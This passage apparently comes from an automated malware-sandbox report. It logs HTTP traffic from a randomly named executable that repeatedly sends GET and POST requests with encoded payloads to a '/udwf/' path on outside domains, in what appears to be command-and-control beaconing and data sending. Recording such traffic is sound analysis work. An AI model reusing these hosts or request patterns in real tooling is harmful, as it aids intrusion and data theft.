nZ28fhm7JkrEPy0siM8g3l9GmN
                                                                                                                            Nov 10, 2023 09:28:36.084145069 CET198INHTTP/1.1 200 OK
                                                                                                                            date: Fri, 10 Nov 2023 08:28:35 GMT
                                                                                                                            content-type: text/html; charset=utf-8
                                                                                                                            content-length: 1109
                                                                                                                            x-request-id: f0f8da48-c0bd-4ffa-9dd2-36b75af5a4f0
                                                                                                                            cache-control: no-store, max-age=0
                                                                                                                            accept-ch: sec-ch-prefers-color-scheme
                                                                                                                            critical-ch: sec-ch-prefers-color-scheme
                                                                                                                            vary: sec-ch-prefers-color-scheme
                                                                                                                            x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_utrfvT18rLbkeWw3m+7aR4sW5K9D3ILMt3IRjGq+Uvf2ZaEZaFIKFbYzks2ocpn/4rY4FmPl0q6B7hNzo7390w==
                                                                                                                            set-cookie: parking_session=f0f8da48-c0bd-4ffa-9dd2-36b75af5a4f0; expires=Fri, 10 Nov 2023 08:43:35 GMT; path=/
                                                                                                                            connection: close
                                                                                                                            Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 75 74 72 66 76 54 31 38 72 4c 62 6b 65 57 77 33 6d 2b 37 61 52 34 73 57 35 4b 39 44 33 49 4c 4d 74 33 49 52 6a 47 71 2b 55 76 66 32 5a 61 45 5a 61 46 49 4b 46 62 59 7a 6b 73 32 6f 63 70 6e 2f 34 72 59 34 46 6d 50 6c 30 71 36 42 37 68 4e 7a 6f 37 33 39 30 77 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 70 6e 67 3b 62 61 73 65 36 34 2c 69 56 42 4f 52 77 30 4b 47 67 6f 41 41 41 41 4e 53 55 68 45 55 67 41 41 41 41 45 41 41 41 41 42 43 41 49 41 41 41 43 51 64 31 50 65 41 41 41 41 44 45 6c 45 51 56 51 49 31 32 50 34 2f 2f 38 2f 41 41 58 2b 41 76 37 63 7a 46 6e 6e 41 41 41 41 41 45 6c 46 54 6b
                                                                                                                            Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_utrfvT18rLbkeWw3m+7aR4sW5K9D3ILMt3IRjGq+Uvf2ZaEZaFIKFbYzks2ocpn/4rY4FmPl0q6B7hNzo7390w==" lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTk
                                                                                                                            Nov 10, 2023 09:28:36.084173918 CET199INData Raw: 53 75 51 6d 43 43 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68
                                                                                                                            Data Ascii: SuQmCC"> <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiZjBmOGRhNDgtYzBiZC00ZmZhLTlkZDItMzZiNzVhZjVhNGYwIiwicGFnZV90aW1lIjoxNjk


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                            16192.168.2.1049731199.59.243.22580C:\Program Files (x86)\dNAGqKTZGUAwaxVqazHCxkYGeHKBIiEYPiPMKrHtQXpznvGBaeqnolUoXkFHVbdDlBIbtsRYWxSQYDD\xIXlFDyvSnsfUSfsjsGwj.exe
                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                            Nov 10, 2023 09:28:38.482089043 CET200OUTGET /udwf/?G0Yxd2Q=Z6xauRs66pTCKL+KzoyNUFozWOf0JDAANa247hz++z0llrRDJuB/QadTAD9i3swhMbuTmmXjFgWivfbmORZNoncA7F7QHJ1+AA==&vhQT=aV8PeNo0MvDl1 HTTP/1.1
                                                                                                                            Host: www.diabloseugene.com
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                            Connection: close
                                                                                                                            User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                                                                            Nov 10, 2023 09:28:38.750719070 CET201INHTTP/1.1 200 OK
                                                                                                                            date: Fri, 10 Nov 2023 08:28:37 GMT
                                                                                                                            content-type: text/html; charset=utf-8
                                                                                                                            content-length: 1409
                                                                                                                            x-request-id: 9e5c3718-e18e-4436-b653-0e660b594865
                                                                                                                            cache-control: no-store, max-age=0
                                                                                                                            accept-ch: sec-ch-prefers-color-scheme
                                                                                                                            critical-ch: sec-ch-prefers-color-scheme
                                                                                                                            vary: sec-ch-prefers-color-scheme
                                                                                                                            x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_XXSFtrj/Leu/y185Xp21xCUpFSO1GnNJqoJVnoz/61k7l2zuTl+e3OgoxMgGsxYpYKk4IjLOQG75FHUn2X/MZg==
                                                                                                                            set-cookie: parking_session=9e5c3718-e18e-4436-b653-0e660b594865; expires=Fri, 10 Nov 2023 08:43:38 GMT; path=/
                                                                                                                            connection: close
                                                                                                                            Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 58 58 53 46 74 72 6a 2f 4c 65 75 2f 79 31 38 35 58 70 32 31 78 43 55 70 46 53 4f 31 47 6e 4e 4a 71 6f 4a 56 6e 6f 7a 2f 36 31 6b 37 6c 32 7a 75 54 6c 2b 65 33 4f 67 6f 78 4d 67 47 73 78 59 70 59 4b 6b 34 49 6a 4c 4f 51 47 37 35 46 48 55 6e 32 58 2f 4d 5a 67 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 70 6e 67 3b 62 61 73 65 36 34 2c 69 56 42 4f 52 77 30 4b 47 67 6f 41 41 41 41 4e 53 55 68 45 55 67 41 41 41 41 45 41 41 41 41 42 43 41 49 41 41 41 43 51 64 31 50 65 41 41 41 41 44 45 6c 45 51 56 51 49 31 32 50 34 2f 2f 38 2f 41 41 58 2b 41 76 37 63 7a 46 6e 6e 41 41 41 41 41 45 6c 46 54 6b
                                                                                                                            Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_XXSFtrj/Leu/y185Xp21xCUpFSO1GnNJqoJVnoz/61k7l2zuTl+e3OgoxMgGsxYpYKk4IjLOQG75FHUn2X/MZg==" lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTk
                                                                                                                            Nov 10, 2023 09:28:38.750745058 CET202INData Raw: 53 75 51 6d 43 43 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68
                                                                                                                            Data Ascii: SuQmCC"> <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiOWU1YzM3MTgtZTE4ZS00NDM2LWI2NTMtMGU2NjBiNTk0ODY1IiwicGFnZV90aW1lIjoxNjk


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                            17192.168.2.1049732162.0.222.11980C:\Program Files (x86)\dNAGqKTZGUAwaxVqazHCxkYGeHKBIiEYPiPMKrHtQXpznvGBaeqnolUoXkFHVbdDlBIbtsRYWxSQYDD\xIXlFDyvSnsfUSfsjsGwj.exe
                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                            Nov 10, 2023 09:28:44.188903093 CET203OUTPOST /udwf/ HTTP/1.1
                                                                                                                            Host: www.spark-tech-global.xyz
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                            Origin: http://www.spark-tech-global.xyz
                                                                                                                            Referer: http://www.spark-tech-global.xyz/udwf/
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Content-Length: 188
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: no-cache
                                                                                                                            User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                                                                            Data Raw: 47 30 59 78 64 32 51 3d 6b 64 69 4f 39 64 46 4c 6b 33 66 48 45 70 54 6d 61 37 30 66 52 5a 75 57 2f 45 32 70 49 34 45 71 6f 71 77 6f 75 74 73 61 64 49 4b 38 34 66 6e 47 4c 31 4c 33 48 49 51 34 62 47 66 4a 53 79 6e 6d 73 6b 33 31 33 66 75 78 39 71 55 5a 37 34 33 6c 73 38 4b 6a 78 62 31 69 4d 7a 58 6e 4c 63 76 5a 67 38 50 49 6f 46 4f 39 47 37 43 77 41 46 31 58 69 2b 6d 67 74 59 31 54 7a 46 68 63 2b 57 58 37 6b 73 39 51 4d 7a 4e 47 47 46 44 4d 58 39 49 65 6f 48 6f 6a 56 32 58 6a 4d 34 52 44 35 4f 6c 6a 7a 6c 73 61 47 37 61 4e 46 63 78 52 67 44 35 45 6b 41 3d 3d
                                                                                                                            Data Ascii: G0Yxd2Q=kdiO9dFLk3fHEpTma70fRZuW/E2pI4EqoqwoutsadIK84fnGL1L3HIQ4bGfJSynmsk313fux9qUZ743ls8Kjxb1iMzXnLcvZg8PIoFO9G7CwAF1Xi+mgtY1TzFhc+WX7ks9QMzNGGFDMX9IeoHojV2XjM4RD5OljzlsaG7aNFcxRgD5EkA==
                                                                                                                            Nov 10, 2023 09:28:44.492309093 CET204INHTTP/1.1 404 Not Found
                                                                                                                            Date: Fri, 10 Nov 2023 08:28:44 GMT
                                                                                                                            Server: Apache
                                                                                                                            Content-Length: 389
                                                                                                                            Connection: close
                                                                                                                            Content-Type: text/html
                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                            Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                            18192.168.2.1049733162.0.222.11980C:\Program Files (x86)\dNAGqKTZGUAwaxVqazHCxkYGeHKBIiEYPiPMKrHtQXpznvGBaeqnolUoXkFHVbdDlBIbtsRYWxSQYDD\xIXlFDyvSnsfUSfsjsGwj.exe
                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                            Nov 10, 2023 09:28:46.913254023 CET205OUTPOST /udwf/ HTTP/1.1
                                                                                                                            Host: www.spark-tech-global.xyz
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                            Origin: http://www.spark-tech-global.xyz
                                                                                                                            Referer: http://www.spark-tech-global.xyz/udwf/
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Content-Length: 208
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: no-cache
                                                                                                                            User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                                                                            Data Raw: 47 30 59 78 64 32 51 3d 6b 64 69 4f 39 64 46 4c 6b 33 66 48 46 4e 76 6d 63 59 73 66 58 35 75 56 77 6b 32 70 47 59 46 68 6f 71 73 6f 75 70 30 4b 64 36 65 38 2f 2b 58 47 4b 33 6a 33 41 49 51 34 55 6d 66 4d 4b 53 6e 78 73 6b 37 39 33 66 69 78 39 71 6f 5a 37 39 7a 6c 74 50 53 6b 77 4c 31 73 45 54 58 68 47 38 76 5a 67 38 50 49 6f 46 62 53 47 37 61 77 41 56 46 58 6a 63 65 76 7a 49 31 55 6b 31 68 63 36 57 57 79 6b 73 38 31 4d 79 51 54 47 41 48 4d 58 2f 41 65 6f 53 49 38 63 32 58 70 43 59 51 50 2f 76 49 4c 76 33 38 64 4e 4f 2b 75 5a 62 59 64 68 57 56 58 6a 77 4a 70 59 74 54 4b 48 73 58 79 73 30 59 79 41 5a 2b 64 71 62 49 3d
                                                                                                                            Data Ascii: G0Yxd2Q=kdiO9dFLk3fHFNvmcYsfX5uVwk2pGYFhoqsoup0Kd6e8/+XGK3j3AIQ4UmfMKSnxsk793fix9qoZ79zltPSkwL1sETXhG8vZg8PIoFbSG7awAVFXjcevzI1Uk1hc6WWyks81MyQTGAHMX/AeoSI8c2XpCYQP/vILv38dNO+uZbYdhWVXjwJpYtTKHsXys0YyAZ+dqbI=
                                                                                                                            Nov 10, 2023 09:28:47.207586050 CET206INHTTP/1.1 404 Not Found
                                                                                                                            Date: Fri, 10 Nov 2023 08:28:47 GMT
                                                                                                                            Server: Apache
                                                                                                                            Content-Length: 389
                                                                                                                            Connection: close
                                                                                                                            Content-Type: text/html
                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                            Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                            19192.168.2.1049734162.0.222.11980C:\Program Files (x86)\dNAGqKTZGUAwaxVqazHCxkYGeHKBIiEYPiPMKrHtQXpznvGBaeqnolUoXkFHVbdDlBIbtsRYWxSQYDD\xIXlFDyvSnsfUSfsjsGwj.exe
                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                            Nov 10, 2023 09:28:51.157749891 CET208OUTPOST /udwf/ HTTP/1.1
                                                                                                                            Host: www.spark-tech-global.xyz
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                            Origin: http://www.spark-tech-global.xyz
                                                                                                                            Referer: http://www.spark-tech-global.xyz/udwf/
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Content-Length: 1220
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: no-cache
                                                                                                                            User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                                                                            Data Raw: 47 30 59 78 64 32 51 3d 6b 64 69 4f 39 64 46 4c 6b 33 66 48 46 4e 76 6d 63 59 73 66 58 35 75 56 77 6b 32 70 47 59 46 68 6f 71 73 6f 75 70 30 4b 64 36 47 38 34 4d 66 47 4c 57 6a 33 42 49 51 34 64 47 66 4e 4b 53 6e 73 73 6b 6a 35 33 66 2b 4c 39 73 73 5a 37 62 50 6c 71 2b 53 6b 35 4c 31 73 49 7a 58 67 4c 63 75 52 67 39 2f 45 6f 46 4c 53 47 37 61 77 41 58 64 58 33 2b 6d 76 78 49 31 54 7a 46 68 49 2b 57 57 61 6b 74 56 49 4d 79 55 44 48 7a 50 4d 58 66 51 65 71 68 67 38 54 32 58 6e 46 59 52 53 2f 76 45 55 76 33 67 6e 4e 4b 32 41 5a 63 55 64 69 41 67 77 33 69 30 2f 62 74 58 6a 50 4d 76 78 67 79 78 4a 61 73 75 31 34 37 73 43 4b 58 49 71 56 48 76 6f 77 6b 6c 63 59 67 65 36 4a 30 69 35 31 4c 70 33 4a 31 71 58 66 76 71 33 6f 73 30 35 4a 7a 35 6f 79 75 4b 69 2b 34 32 45 49 6d 41 57 7a 4f 79 70 6f 39 65 71 31 45 39 33 62 73 68 38 55 79 63 4d 41 4f 51 48 70 32 76 55 69 46 48 38 57 59 51 70 73 39 43 67 61 39 34 58 54 63 46 6d 35 39 45 2b 46 37 4c 32 61 52 35 5a 6e 4c 4e 50 30 71 75 42 30 39 37 65 42 31 30 6a 74 42 30 52 58 73 68 4b 43 35 4a 47 64 37 37 38 34 2b 65 67 69 42 51 67 46 6e 53 57 49 6a 6e 65 5a 32 74 64 49 44 64 53 6b 43 69 49 6d 76 43 67 5a 58 4b 36 32 4e 51 74 69 63 53 4e 58 58 66 53 59 4a 46 34 65 41 6f 53 70 6e 30 7a 77 41 73 74 66 50 6c 4a 37 31 79 56 55 68 6c 68 69 71 6f 78 78 6c 4a 51 46 5a 72 75 74 6b 79 44 6f 2f 42 6e 61 62 36 56 7a 49 6c 6c 53 73 71 46 39 77 6b 49 6a 61 53 4f 69 69 32 74 32 66 64 6c 78 4f 4c 6e 59 57 72 4a 4d 74 36 79 67 48 4e 49 33 63 71 61 39 6c 52 72 2b 59 75 79 4a 69 75 70 45 37 32 35 34 49 33 39 67 74 45 63 6e 4f 64 73 56 4c 42 71 75 41 6c 67 44 33 4b 70 63 30 6d 66 63 43 63 67 39 38 6b 2b 31 41 2f 48 61 52 6b 4a 74 41 4f 4b 64 4f 41 39 6f 47 4c 2b 37 34 77 41 46 76 58 78 33 7a 53 43 2f 69 4c 4e 6a 58 68 45 47 66 57 73 56 71 6e 32 78 70 6c 47 70 72 36 68 30 58 70 31 54 31 66 6b 41 38 79 55 79 42 48 74 74 76 42 30 69 72 79 45 4f 57 32 58 2f 64 64 48 63 76 69 37 5a 37 65 66 6c 5a 6e 58 52 30 37 4a 45 65 72 38 56 69 42 56 4d 44 37 47 70 72 5a 63 6b 57 41 72 79 54 44 73 6d 42 73 6f 4f 47 45 38 39 6b 6d 62 6a 7a 64 43 45 73 43 49 66 71 7a 74 4f 61 31 39 50 59 54 51 55 53 6d 73 68 30 42 46 45 4a 46 4a 4c 4e 33 52 69 34 59 65 79 5a 32 43 58 36 4d 56 32 65 30 33 4d 53 73 58 6e 55 6f 58 37 70 77 53 57 4a 7a 2b 6f 62 58 71 69 6b 30 39 35 55 52 72 78 65 2f 36 45 78 70 38 71 4d 38 31 6a 31 74 65 47 37 57 42 4a 2b 6b 35 35 74 51 41 64 2f 34 35 79 7a 4b 74 4b 49 54 37 31 6f 50 72 38 42 48 54 51 59 77 32 73 78 43 5a 43 4d 59 66 63 57 43 4a 31 76 6b 53 68 6c 74 71 64 57 4d 72 6a 4a 46 41 4b 4e 63 48 69 73 50 51 61 53 43 67 66 6a 66 43 78 33 39 79 31 6d 6f 6e 78 4b 4b 69 73 47 33 7a 38 71 4a 45 49 6d 46 34 4c 75 32 2b 74 66 65 65 78 76 32 61 76 61 74 4f 6b 39 56 79 57 7a 78 4e 4d 46 67 47 4f 34 63 59 67 4a 38 55 4c 34 6d 41 54 46 65 6a 66 6c 67 74 2b 39 63 57 62 59 76 58 69 66 64 6f 78 37 30 52 6a 39 66 61 2f 61 49 64 4d 45 69 51 35 6d 30 44 45 49 56 30 56 71 48 67 4e 53 64 6d 6b 39 44 52 79 78 53 47 44 2f 78 2b 31 36 4f 4b 43 56 71 70 55 55 70 7a 4d 50 7a 52 32 72 65 6d 57 31 30 66 6b 4f 37 6b 69 4c 6a 30 36 6c 36 77 4c 31 56 4d 56 69 77 63 4c 6b 4c 39 44 4f 6d 6e 57 2f 75 4c 34 45 66 75 54 62 59 77 57 4f 63 47 44 74 6d 73 62 58 6a 57 55 63 57 33 7a 67 55 78 69 34 70 50 31 35 4f 71 51 5a 41 4c 31 35 77 50 44 50 42 6d 72 6e 76 36 79 6b 30 2b 47 37 64 47 61 53 55 44 57 57 42 77 6b 6a 55 63 61 67 54 6d 39 46 68 6b 6a 47 46 4c 6e 43 50 51 6a 48 79 42 58 69 63 6c 51 7a 7a 47 65 35 58 46 6e 69 72 46 49 38 67 31 31 71 54 39 6d 6d 6b 55 32 39 42 57 74 48 2f 46 7a 79 37 51 38 54 35 30 64 69 36 64 5a 76 69 4a 57 34 4c 4e 71 42 57 58 6e 68 6e 6e 48 42 55 49 4e 39 55 76 6d 69 31 4c 43 6e 59 76
                                                                                                                            Data Ascii: 